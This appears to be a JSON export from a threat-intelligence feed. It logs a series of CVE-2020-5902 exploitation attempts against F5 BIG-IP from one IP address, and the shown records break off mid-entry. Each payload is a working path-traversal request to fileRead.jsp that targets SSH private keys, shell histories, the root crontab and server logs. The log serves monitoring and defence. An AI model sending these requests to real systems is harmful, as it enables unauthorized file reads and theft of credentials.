CVE-2020-5902 activity detected from 85.248.227.163

1. {
2. "count": 182,
3. "next": null,
4. "previous": null,
5. "results": [
6. {
7. "event_id": "c8d956425afd6ae1bdf1d2ad9c2a88afd6fda018c7b4766b637d24c3b260b96a",
8. "source_ip_address": "85.248.227.163",
9. "country": "SK",
10. "user_agent": "python-requests/2.23.0",
11. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.xsession HTTP/1.1",
12. "post_data": "",
13. "target_port": 443,
14. "protocol": "tcp",
15. "tags": [
16. {
17. "cve": "CVE-2020-5902",
18. "category": "Platform",
19. "description": "F5 BIG-IP Configuration Utility RCE"
20. }
21. ],
22. "event_count": 1,
23. "first_seen": "2020-07-09T08:07:50Z",
24. "last_seen": "2020-07-09T08:07:50Z"
25. },
26. {
27. "event_id": "e6181a59ae72dfbd8904af37c7f71832d4dc443f42c5be171e4244c0bce1fc43",
28. "source_ip_address": "85.248.227.163",
29. "country": "SK",
30. "user_agent": "python-requests/2.23.0",
31. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.Xresources HTTP/1.1",
32. "post_data": "",
33. "target_port": 443,
34. "protocol": "tcp",
35. "tags": [
36. {
37. "cve": "CVE-2020-5902",
38. "category": "Platform",
39. "description": "F5 BIG-IP Configuration Utility RCE"
40. }
41. ],
42. "event_count": 1,
43. "first_seen": "2020-07-09T08:07:49Z",
44. "last_seen": "2020-07-09T08:07:49Z"
45. },
46. {
47. "event_id": "bbab534aa62e2664babea3da25baa2e8185658b5cc8cd45536f7c4db8c6c5930",
48. "source_ip_address": "85.248.227.163",
49. "country": "SK",
50. "user_agent": "python-requests/2.23.0",
51. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.xinitrc HTTP/1.1",
52. "post_data": "",
53. "target_port": 443,
54. "protocol": "tcp",
55. "tags": [
56. {
57. "cve": "CVE-2020-5902",
58. "category": "Platform",
59. "description": "F5 BIG-IP Configuration Utility RCE"
60. }
61. ],
62. "event_count": 1,
63. "first_seen": "2020-07-09T08:07:47Z",
64. "last_seen": "2020-07-09T08:07:47Z"
65. },
66. {
67. "event_id": "d3cffd32de67bf847a50a948b46a9a82bed1a6700d57b8b66a9520cb92849e8f",
68. "source_ip_address": "85.248.227.163",
69. "country": "SK",
70. "user_agent": "python-requests/2.23.0",
71. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.Xdefaults HTTP/1.1",
72. "post_data": "",
73. "target_port": 443,
74. "protocol": "tcp",
75. "tags": [
76. {
77. "cve": "CVE-2020-5902",
78. "category": "Platform",
79. "description": "F5 BIG-IP Configuration Utility RCE"
80. }
81. ],
82. "event_count": 1,
83. "first_seen": "2020-07-09T08:07:46Z",
84. "last_seen": "2020-07-09T08:07:46Z"
85. },
86. {
87. "event_id": "7e94d9508f67b9d8c08a5f13e8f62f0724921aa39239a1eefa2069df04b2a6e8",
88. "source_ip_address": "85.248.227.163",
89. "country": "SK",
90. "user_agent": "python-requests/2.23.0",
91. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.wm_style HTTP/1.1",
92. "post_data": "",
93. "target_port": 443,
94. "protocol": "tcp",
95. "tags": [
96. {
97. "cve": "CVE-2020-5902",
98. "category": "Platform",
99. "description": "F5 BIG-IP Configuration Utility RCE"
100. }
101. ],
102. "event_count": 1,
103. "first_seen": "2020-07-09T08:07:44Z",
104. "last_seen": "2020-07-09T08:07:44Z"
105. },
106. {
107. "event_id": "bcd8a55dbed139192c4484591b63e411c6e9b8b8cddd7083027e2a7bd15da102",
108. "source_ip_address": "85.248.227.163",
109. "country": "SK",
110. "user_agent": "python-requests/2.23.0",
111. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.viminfo HTTP/1.1",
112. "post_data": "",
113. "target_port": 443,
114. "protocol": "tcp",
115. "tags": [
116. {
117. "cve": "CVE-2020-5902",
118. "category": "Platform",
119. "description": "F5 BIG-IP Configuration Utility RCE"
120. }
121. ],
122. "event_count": 1,
123. "first_seen": "2020-07-09T08:07:43Z",
124. "last_seen": "2020-07-09T08:07:43Z"
125. },
126. {
127. "event_id": "f25cfd80cc556e7c127df87b201ea909af85b7e65e809827de8c62ff72a1901a",
128. "source_ip_address": "85.248.227.163",
129. "country": "SK",
130. "user_agent": "python-requests/2.23.0",
131. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.ssh/identity.pub HTTP/1.1",
132. "post_data": "",
133. "target_port": 443,
134. "protocol": "tcp",
135. "tags": [
136. {
137. "cve": "CVE-2020-5902",
138. "category": "Platform",
139. "description": "F5 BIG-IP Configuration Utility RCE"
140. }
141. ],
142. "event_count": 1,
143. "first_seen": "2020-07-09T08:07:41Z",
144. "last_seen": "2020-07-09T08:07:41Z"
145. },
146. {
147. "event_id": "aeba7fe8646cd0884df9982a77ea7a4a1e82ff9e7d115532fac57c1ecf74db75",
148. "source_ip_address": "85.248.227.163",
149. "country": "SK",
150. "user_agent": "python-requests/2.23.0",
151. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.ssh/identity HTTP/1.1",
152. "post_data": "",
153. "target_port": 443,
154. "protocol": "tcp",
155. "tags": [
156. {
157. "cve": "CVE-2020-5902",
158. "category": "Platform",
159. "description": "F5 BIG-IP Configuration Utility RCE"
160. }
161. ],
162. "event_count": 1,
163. "first_seen": "2020-07-09T08:07:40Z",
164. "last_seen": "2020-07-09T08:07:40Z"
165. },
166. {
167. "event_id": "b0e9ba64bb650260c58945667a49eabdd68222adcda217cf5bc3f40f038ae85b",
168. "source_ip_address": "85.248.227.163",
169. "country": "SK",
170. "user_agent": "python-requests/2.23.0",
171. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.ssh/id_rsa.pub HTTP/1.1",
172. "post_data": "",
173. "target_port": 443,
174. "protocol": "tcp",
175. "tags": [
176. {
177. "cve": "CVE-2020-5902",
178. "category": "Platform",
179. "description": "F5 BIG-IP Configuration Utility RCE"
180. }
181. ],
182. "event_count": 1,
183. "first_seen": "2020-07-09T08:07:38Z",
184. "last_seen": "2020-07-09T08:07:38Z"
185. },
186. {
187. "event_id": "68d1647f8f886c0c14d1fb3194b221c71e2daaae8ac798f120addad8e73338ef",
188. "source_ip_address": "85.248.227.163",
189. "country": "SK",
190. "user_agent": "python-requests/2.23.0",
191. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.ssh/id_rsa HTTP/1.1",
192. "post_data": "",
193. "target_port": 443,
194. "protocol": "tcp",
195. "tags": [
196. {
197. "cve": "CVE-2020-5902",
198. "category": "Platform",
199. "description": "F5 BIG-IP Configuration Utility RCE"
200. }
201. ],
202. "event_count": 1,
203. "first_seen": "2020-07-09T08:07:37Z",
204. "last_seen": "2020-07-09T08:07:37Z"
205. },
206. {
207. "event_id": "f464219498bce9ef7c270712f3f38926e6ecd7831d2b4f229b044a5bada1333f",
208. "source_ip_address": "85.248.227.163",
209. "country": "SK",
210. "user_agent": "python-requests/2.23.0",
211. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.ssh/id_dsa.pub HTTP/1.1",
212. "post_data": "",
213. "target_port": 443,
214. "protocol": "tcp",
215. "tags": [
216. {
217. "cve": "CVE-2020-5902",
218. "category": "Platform",
219. "description": "F5 BIG-IP Configuration Utility RCE"
220. }
221. ],
222. "event_count": 1,
223. "first_seen": "2020-07-09T08:07:35Z",
224. "last_seen": "2020-07-09T08:07:35Z"
225. },
226. {
227. "event_id": "8441001f01d34e6657c6ddedae3c6d5a69beb4427e1dd28a509a67f1566feb01",
228. "source_ip_address": "85.248.227.163",
229. "country": "SK",
230. "user_agent": "python-requests/2.23.0",
231. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.ssh/id_dsa HTTP/1.1",
232. "post_data": "",
233. "target_port": 443,
234. "protocol": "tcp",
235. "tags": [
236. {
237. "cve": "CVE-2020-5902",
238. "category": "Platform",
239. "description": "F5 BIG-IP Configuration Utility RCE"
240. }
241. ],
242. "event_count": 1,
243. "first_seen": "2020-07-09T08:07:34Z",
244. "last_seen": "2020-07-09T08:07:34Z"
245. },
246. {
247. "event_id": "9b24dfad12f35465e04e5fba6d491b1526236aef53b29d4b2e195cddbfee61c0",
248. "source_ip_address": "85.248.227.163",
249. "country": "SK",
250. "user_agent": "python-requests/2.23.0",
251. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.ssh/authorized_keys HTTP/1.1",
252. "post_data": "",
253. "target_port": 443,
254. "protocol": "tcp",
255. "tags": [
256. {
257. "cve": "CVE-2020-5902",
258. "category": "Platform",
259. "description": "F5 BIG-IP Configuration Utility RCE"
260. }
261. ],
262. "event_count": 1,
263. "first_seen": "2020-07-09T08:07:32Z",
264. "last_seen": "2020-07-09T08:07:32Z"
265. },
266. {
267. "event_id": "64b5a7134eb2323185ab7466e7fe27f3ccea03567f821cb2a8f59e82c7a6408a",
268. "source_ip_address": "85.248.227.163",
269. "country": "SK",
270. "user_agent": "python-requests/2.23.0",
271. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.profile HTTP/1.1",
272. "post_data": "",
273. "target_port": 443,
274. "protocol": "tcp",
275. "tags": [
276. {
277. "cve": "CVE-2020-5902",
278. "category": "Platform",
279. "description": "F5 BIG-IP Configuration Utility RCE"
280. }
281. ],
282. "event_count": 1,
283. "first_seen": "2020-07-09T08:07:31Z",
284. "last_seen": "2020-07-09T08:07:31Z"
285. },
286. {
287. "event_id": "4b941a42a14fb12bc816a8d1fc328d9a5391e6151e314bfd36713ca1a6f69cbe",
288. "source_ip_address": "85.248.227.163",
289. "country": "SK",
290. "user_agent": "python-requests/2.23.0",
291. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.php_history HTTP/1.1",
292. "post_data": "",
293. "target_port": 443,
294. "protocol": "tcp",
295. "tags": [
296. {
297. "cve": "CVE-2020-5902",
298. "category": "Platform",
299. "description": "F5 BIG-IP Configuration Utility RCE"
300. }
301. ],
302. "event_count": 1,
303. "first_seen": "2020-07-09T08:07:30Z",
304. "last_seen": "2020-07-09T08:07:30Z"
305. },
306. {
307. "event_id": "fa7de07faf2f4661918e995bcec1a465191267fecab98d2f54702c583165b14f",
308. "source_ip_address": "85.248.227.163",
309. "country": "SK",
310. "user_agent": "python-requests/2.23.0",
311. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.nano_history HTTP/1.1",
312. "post_data": "",
313. "target_port": 443,
314. "protocol": "tcp",
315. "tags": [
316. {
317. "cve": "CVE-2020-5902",
318. "category": "Platform",
319. "description": "F5 BIG-IP Configuration Utility RCE"
320. }
321. ],
322. "event_count": 1,
323. "first_seen": "2020-07-09T08:07:28Z",
324. "last_seen": "2020-07-09T08:07:28Z"
325. },
326. {
327. "event_id": "1ea12d1cfdad717baff44e9c5efbeed148a0a96d958c36f6fb667ea8030afb89",
328. "source_ip_address": "85.248.227.163",
329. "country": "SK",
330. "user_agent": "python-requests/2.23.0",
331. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.mysql_history HTTP/1.1",
332. "post_data": "",
333. "target_port": 443,
334. "protocol": "tcp",
335. "tags": [
336. {
337. "cve": "CVE-2020-5902",
338. "category": "Platform",
339. "description": "F5 BIG-IP Configuration Utility RCE"
340. }
341. ],
342. "event_count": 1,
343. "first_seen": "2020-07-09T08:07:27Z",
344. "last_seen": "2020-07-09T08:07:27Z"
345. },
346. {
347. "event_id": "d4f7f83a38220e31ac03ee9591b45272cf32e50be47fb54db398830172ca9440",
348. "source_ip_address": "85.248.227.163",
349. "country": "SK",
350. "user_agent": "python-requests/2.23.0",
351. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.logout HTTP/1.1",
352. "post_data": "",
353. "target_port": 443,
354. "protocol": "tcp",
355. "tags": [
356. {
357. "cve": "CVE-2020-5902",
358. "category": "Platform",
359. "description": "F5 BIG-IP Configuration Utility RCE"
360. }
361. ],
362. "event_count": 1,
363. "first_seen": "2020-07-09T08:07:25Z",
364. "last_seen": "2020-07-09T08:07:25Z"
365. },
366. {
367. "event_id": "5620fecf29b26fea05a230d018f8f8d7df6e2063d98d6b1955d400212bd28907",
368. "source_ip_address": "85.248.227.163",
369. "country": "SK",
370. "user_agent": "python-requests/2.23.0",
371. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.login HTTP/1.1",
372. "post_data": "",
373. "target_port": 443,
374. "protocol": "tcp",
375. "tags": [
376. {
377. "cve": "CVE-2020-5902",
378. "category": "Platform",
379. "description": "F5 BIG-IP Configuration Utility RCE"
380. }
381. ],
382. "event_count": 1,
383. "first_seen": "2020-07-09T08:07:24Z",
384. "last_seen": "2020-07-09T08:07:24Z"
385. },
386. {
387. "event_id": "50cfb5b80e5d6c7385437a75066282adebf74cdbc3e3b06d76974996ea0b34eb",
388. "source_ip_address": "85.248.227.163",
389. "country": "SK",
390. "user_agent": "python-requests/2.23.0",
391. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.gtkrc HTTP/1.1",
392. "post_data": "",
393. "target_port": 443,
394. "protocol": "tcp",
395. "tags": [
396. {
397. "cve": "CVE-2020-5902",
398. "category": "Platform",
399. "description": "F5 BIG-IP Configuration Utility RCE"
400. }
401. ],
402. "event_count": 1,
403. "first_seen": "2020-07-09T08:07:22Z",
404. "last_seen": "2020-07-09T08:07:22Z"
405. },
406. {
407. "event_id": "b4a9c796e4b0695057c2e514874f57d7b542ade1f95f0d3300822156ba670b76",
408. "source_ip_address": "85.248.227.163",
409. "country": "SK",
410. "user_agent": "python-requests/2.23.0",
411. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.bashrc HTTP/1.1",
412. "post_data": "",
413. "target_port": 443,
414. "protocol": "tcp",
415. "tags": [
416. {
417. "cve": "CVE-2020-5902",
418. "category": "Platform",
419. "description": "F5 BIG-IP Configuration Utility RCE"
420. }
421. ],
422. "event_count": 1,
423. "first_seen": "2020-07-09T08:07:21Z",
424. "last_seen": "2020-07-09T08:07:21Z"
425. },
426. {
427. "event_id": "390940616c39863bdc9aff064cad70e526a9b829b2866ec392a365c6bd1495fa",
428. "source_ip_address": "85.248.227.163",
429. "country": "SK",
430. "user_agent": "python-requests/2.23.0",
431. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.bash_profile HTTP/1.1",
432. "post_data": "",
433. "target_port": 443,
434. "protocol": "tcp",
435. "tags": [
436. {
437. "cve": "CVE-2020-5902",
438. "category": "Platform",
439. "description": "F5 BIG-IP Configuration Utility RCE"
440. }
441. ],
442. "event_count": 1,
443. "first_seen": "2020-07-09T08:07:19Z",
444. "last_seen": "2020-07-09T08:07:19Z"
445. },
446. {
447. "event_id": "5330acdc02835be01f5283457b3e21da32d968eec38815a1c2b6d29f0c3c863a",
448. "source_ip_address": "85.248.227.163",
449. "country": "SK",
450. "user_agent": "python-requests/2.23.0",
451. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.bash_logout HTTP/1.1",
452. "post_data": "",
453. "target_port": 443,
454. "protocol": "tcp",
455. "tags": [
456. {
457. "cve": "CVE-2020-5902",
458. "category": "Platform",
459. "description": "F5 BIG-IP Configuration Utility RCE"
460. }
461. ],
462. "event_count": 1,
463. "first_seen": "2020-07-09T08:07:18Z",
464. "last_seen": "2020-07-09T08:07:18Z"
465. },
466. {
467. "event_id": "efd7473faefc27c61012347a98effa91357de61f38616476cb017950852d8f10",
468. "source_ip_address": "85.248.227.163",
469. "country": "SK",
470. "user_agent": "python-requests/2.23.0",
471. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.bash_history HTTP/1.1",
472. "post_data": "",
473. "target_port": 443,
474. "protocol": "tcp",
475. "tags": [
476. {
477. "cve": "CVE-2020-5902",
478. "category": "Platform",
479. "description": "F5 BIG-IP Configuration Utility RCE"
480. }
481. ],
482. "event_count": 1,
483. "first_seen": "2020-07-09T08:07:17Z",
484. "last_seen": "2020-07-09T08:07:17Z"
485. },
486. {
487. "event_id": "e8aa230be6714f7ef155d47ae7cdd7b019b89cf6d6f1600505cac6b78e5e6915",
488. "source_ip_address": "85.248.227.163",
489. "country": "SK",
490. "user_agent": "python-requests/2.23.0",
491. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=~/.atfp_history HTTP/1.1",
492. "post_data": "",
493. "target_port": 443,
494. "protocol": "tcp",
495. "tags": [
496. {
497. "cve": "CVE-2020-5902",
498. "category": "Platform",
499. "description": "F5 BIG-IP Configuration Utility RCE"
500. }
501. ],
502. "event_count": 1,
503. "first_seen": "2020-07-09T08:07:15Z",
504. "last_seen": "2020-07-09T08:07:15Z"
505. },
506. {
507. "event_id": "90bd0f3a6db72491bda9daa741c8dca27cadbdc9e7bc4da1cce71805e0e1a1a7",
508. "source_ip_address": "85.248.227.163",
509. "country": "SK",
510. "user_agent": "python-requests/2.23.0",
511. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/www/logs/error.log HTTP/1.1",
512. "post_data": "",
513. "target_port": 443,
514. "protocol": "tcp",
515. "tags": [
516. {
517. "cve": "CVE-2020-5902",
518. "category": "Platform",
519. "description": "F5 BIG-IP Configuration Utility RCE"
520. }
521. ],
522. "event_count": 1,
523. "first_seen": "2020-07-09T08:07:14Z",
524. "last_seen": "2020-07-09T08:07:14Z"
525. },
526. {
527. "event_id": "2c043e5840b75ad4573196c83e2f425c93ee6b10299b1ce26e60b8f665281c6f",
528. "source_ip_address": "85.248.227.163",
529. "country": "SK",
530. "user_agent": "python-requests/2.23.0",
531. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/www/logs/access.log HTTP/1.1",
532. "post_data": "",
533. "target_port": 443,
534. "protocol": "tcp",
535. "tags": [
536. {
537. "cve": "CVE-2020-5902",
538. "category": "Platform",
539. "description": "F5 BIG-IP Configuration Utility RCE"
540. }
541. ],
542. "event_count": 1,
543. "first_seen": "2020-07-09T08:07:12Z",
544. "last_seen": "2020-07-09T08:07:12Z"
545. },
546. {
547. "event_id": "81f67cd61a9ff76e5ff54b222f62b1a0570174852553d207a10bfb954d8ec066",
548. "source_ip_address": "85.248.227.163",
549. "country": "SK",
550. "user_agent": "python-requests/2.23.0",
551. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/www/logs/error_log HTTP/1.1",
552. "post_data": "",
553. "target_port": 443,
554. "protocol": "tcp",
555. "tags": [
556. {
557. "cve": "CVE-2020-5902",
558. "category": "Platform",
559. "description": "F5 BIG-IP Configuration Utility RCE"
560. }
561. ],
562. "event_count": 1,
563. "first_seen": "2020-07-09T08:07:11Z",
564. "last_seen": "2020-07-09T08:07:11Z"
565. },
566. {
567. "event_id": "3da3ad19087bc07f49743458b7b91e3103ae715af90cb126c8628f6dbf1ed67d",
568. "source_ip_address": "85.248.227.163",
569. "country": "SK",
570. "user_agent": "python-requests/2.23.0",
571. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/www/logs/access_log HTTP/1.1",
572. "post_data": "",
573. "target_port": 443,
574. "protocol": "tcp",
575. "tags": [
576. {
577. "cve": "CVE-2020-5902",
578. "category": "Platform",
579. "description": "F5 BIG-IP Configuration Utility RCE"
580. }
581. ],
582. "event_count": 1,
583. "first_seen": "2020-07-09T08:07:09Z",
584. "last_seen": "2020-07-09T08:07:09Z"
585. },
586. {
587. "event_id": "6feac103cb26a6fddd24bf58a461e90f1ed5972745d582f9fc61f0280606817e",
588. "source_ip_address": "85.248.227.163",
589. "country": "SK",
590. "user_agent": "python-requests/2.23.0",
591. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/www/log/error_log HTTP/1.1",
592. "post_data": "",
593. "target_port": 443,
594. "protocol": "tcp",
595. "tags": [
596. {
597. "cve": "CVE-2020-5902",
598. "category": "Platform",
599. "description": "F5 BIG-IP Configuration Utility RCE"
600. }
601. ],
602. "event_count": 1,
603. "first_seen": "2020-07-09T08:07:08Z",
604. "last_seen": "2020-07-09T08:07:08Z"
605. },
606. {
607. "event_id": "90cd2cf5b7551a91d9d243193c132f6a2a7e256fb524ca24ebc7edb0e0cc68bd",
608. "source_ip_address": "85.248.227.163",
609. "country": "SK",
610. "user_agent": "python-requests/2.23.0",
611. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/www/log/access_log HTTP/1.1",
612. "post_data": "",
613. "target_port": 443,
614. "protocol": "tcp",
615. "tags": [
616. {
617. "cve": "CVE-2020-5902",
618. "category": "Platform",
619. "description": "F5 BIG-IP Configuration Utility RCE"
620. }
621. ],
622. "event_count": 1,
623. "first_seen": "2020-07-09T08:07:06Z",
624. "last_seen": "2020-07-09T08:07:06Z"
625. },
626. {
627. "event_id": "756823160aa9f97c70eba80d3e2dc0cdbbd508928c3ba5ff1c18033082fe9420",
628. "source_ip_address": "85.248.227.163",
629. "country": "SK",
630. "user_agent": "python-requests/2.23.0",
631. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/webmin/miniserv.log HTTP/1.1",
632. "post_data": "",
633. "target_port": 443,
634. "protocol": "tcp",
635. "tags": [
636. {
637. "cve": "CVE-2020-5902",
638. "category": "Platform",
639. "description": "F5 BIG-IP Configuration Utility RCE"
640. }
641. ],
642. "event_count": 1,
643. "first_seen": "2020-07-09T08:07:05Z",
644. "last_seen": "2020-07-09T08:07:05Z"
645. },
646. {
647. "event_id": "6875f4192ce0a4ed70bde7984da3b66a872f8d031431533d3e09979b23c752d3",
648. "source_ip_address": "85.248.227.163",
649. "country": "SK",
650. "user_agent": "python-requests/2.23.0",
651. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/spool/cron/crontabs/root HTTP/1.1",
652. "post_data": "",
653. "target_port": 443,
654. "protocol": "tcp",
655. "tags": [
656. {
657. "cve": "CVE-2020-5902",
658. "category": "Platform",
659. "description": "F5 BIG-IP Configuration Utility RCE"
660. }
661. ],
662. "event_count": 1,
663. "first_seen": "2020-07-09T08:07:04Z",
664. "last_seen": "2020-07-09T08:07:04Z"
665. },
666. {
667. "event_id": "93d7f13280678a681f945a5752940381db1685a70a2d0c8c1a46b5625a49d4ec",
668. "source_ip_address": "85.248.227.163",
669. "country": "SK",
670. "user_agent": "python-requests/2.23.0",
671. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/run/utmp HTTP/1.1",
672. "post_data": "",
673. "target_port": 443,
674. "protocol": "tcp",
675. "tags": [
676. {
677. "cve": "CVE-2020-5902",
678. "category": "Platform",
679. "description": "F5 BIG-IP Configuration Utility RCE"
680. }
681. ],
682. "event_count": 1,
683. "first_seen": "2020-07-09T08:07:02Z",
684. "last_seen": "2020-07-09T08:07:02Z"
685. },
686. {
687. "event_id": "030f14dbbf28c3112a8b29cf1ae323099a0cc48bf520878ad309712c70c5c60b",
688. "source_ip_address": "85.248.227.163",
689. "country": "SK",
690. "user_agent": "python-requests/2.23.0",
691. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/mysql.log HTTP/1.1",
692. "post_data": "",
693. "target_port": 443,
694. "protocol": "tcp",
695. "tags": [
696. {
697. "cve": "CVE-2020-5902",
698. "category": "Platform",
699. "description": "F5 BIG-IP Configuration Utility RCE"
700. }
701. ],
702. "event_count": 1,
703. "first_seen": "2020-07-09T08:07:01Z",
704. "last_seen": "2020-07-09T08:07:01Z"
705. },
706. {
707. "event_id": "5093d72412b90f07f6b72639605146d12c6eb03df42ea9038e2a082c03cf3df4",
708. "source_ip_address": "85.248.227.163",
709. "country": "SK",
710. "user_agent": "python-requests/2.23.0",
711. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/yum.log HTTP/1.1",
712. "post_data": "",
713. "target_port": 443,
714. "protocol": "tcp",
715. "tags": [
716. {
717. "cve": "CVE-2020-5902",
718. "category": "Platform",
719. "description": "F5 BIG-IP Configuration Utility RCE"
720. }
721. ],
722. "event_count": 1,
723. "first_seen": "2020-07-09T08:06:59Z",
724. "last_seen": "2020-07-09T08:06:59Z"
725. },
726. {
727. "event_id": "515496b762cf1bb2cb54e28b47e7e96cdb8fcc77d382b19dcd6cf73e28a6892d",
728. "source_ip_address": "85.248.227.163",
729. "country": "SK",
730. "user_agent": "python-requests/2.23.0",
731. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/xferlog HTTP/1.1",
732. "post_data": "",
733. "target_port": 443,
734. "protocol": "tcp",
735. "tags": [
736. {
737. "cve": "CVE-2020-5902",
738. "category": "Platform",
739. "description": "F5 BIG-IP Configuration Utility RCE"
740. }
741. ],
742. "event_count": 1,
743. "first_seen": "2020-07-09T08:06:58Z",
744. "last_seen": "2020-07-09T08:06:58Z"
745. },
746. {
747. "event_id": "9585fdeb1fc09d44e2206caf2306aedb6909bfc898e0634ee7cb65e87447ed6a",
748. "source_ip_address": "85.248.227.163",
749. "country": "SK",
750. "user_agent": "python-requests/2.23.0",
751. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/wtmp HTTP/1.1",
752. "post_data": "",
753. "target_port": 443,
754. "protocol": "tcp",
755. "tags": [
756. {
757. "cve": "CVE-2020-5902",
758. "category": "Platform",
759. "description": "F5 BIG-IP Configuration Utility RCE"
760. }
761. ],
762. "event_count": 1,
763. "first_seen": "2020-07-09T08:06:57Z",
764. "last_seen": "2020-07-09T08:06:57Z"
765. },
766. {
767. "event_id": "3df5a0c5a767f8bfcd1e25a85fcd2707dd236fb6c8958aba14b8a3cc427d608b",
768. "source_ip_address": "85.248.227.163",
769. "country": "SK",
770. "user_agent": "python-requests/2.23.0",
771. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/vsftpd.log HTTP/1.1",
772. "post_data": "",
773. "target_port": 443,
774. "protocol": "tcp",
775. "tags": [
776. {
777. "cve": "CVE-2020-5902",
778. "category": "Platform",
779. "description": "F5 BIG-IP Configuration Utility RCE"
780. }
781. ],
782. "event_count": 1,
783. "first_seen": "2020-07-09T08:06:55Z",
784. "last_seen": "2020-07-09T08:06:55Z"
785. },
786. {
787. "event_id": "3c0b687fa4448462a72d4fba85f9e60d4b8816f23f99c5c0dc60a4d7c9b15708",
788. "source_ip_address": "85.248.227.163",
789. "country": "SK",
790. "user_agent": "python-requests/2.23.0",
791. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/secure HTTP/1.1",
792. "post_data": "",
793. "target_port": 443,
794. "protocol": "tcp",
795. "tags": [
796. {
797. "cve": "CVE-2020-5902",
798. "category": "Platform",
799. "description": "F5 BIG-IP Configuration Utility RCE"
800. }
801. ],
802. "event_count": 1,
803. "first_seen": "2020-07-09T08:06:54Z",
804. "last_seen": "2020-07-09T08:06:54Z"
805. },
806. {
807. "event_id": "4f53f92e0f4bca5f371c295be076c5fd70aa671054d46162c080a17c566e0cf9",
808. "source_ip_address": "85.248.227.163",
809. "country": "SK",
810. "user_agent": "python-requests/2.23.0",
811. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/pure-ftpd/pure-ftpd.log HTTP/1.1",
812. "post_data": "",
813. "target_port": 443,
814. "protocol": "tcp",
815. "tags": [
816. {
817. "cve": "CVE-2020-5902",
818. "category": "Platform",
819. "description": "F5 BIG-IP Configuration Utility RCE"
820. }
821. ],
822. "event_count": 1,
823. "first_seen": "2020-07-09T08:06:52Z",
824. "last_seen": "2020-07-09T08:06:52Z"
825. },
826. {
827. "event_id": "8ea7d417d7e867f20f5ceb2709116e2110f2e3dc01bae9246b5a993032352a07",
828. "source_ip_address": "85.248.227.163",
829. "country": "SK",
830. "user_agent": "python-requests/2.23.0",
831. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/pureftpd.log HTTP/1.1",
832. "post_data": "",
833. "target_port": 443,
834. "protocol": "tcp",
835. "tags": [
836. {
837. "cve": "CVE-2020-5902",
838. "category": "Platform",
839. "description": "F5 BIG-IP Configuration Utility RCE"
840. }
841. ],
842. "event_count": 1,
843. "first_seen": "2020-07-09T08:06:51Z",
844. "last_seen": "2020-07-09T08:06:51Z"
845. },
846. {
847. "event_id": "e351e73d4f81706070e36b5797400852c0cf941e62575dc891152db70852eb7b",
848. "source_ip_address": "85.248.227.163",
849. "country": "SK",
850. "user_agent": "python-requests/2.23.0",
851. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/proftpd HTTP/1.1",
852. "post_data": "",
853. "target_port": 443,
854. "protocol": "tcp",
855. "tags": [
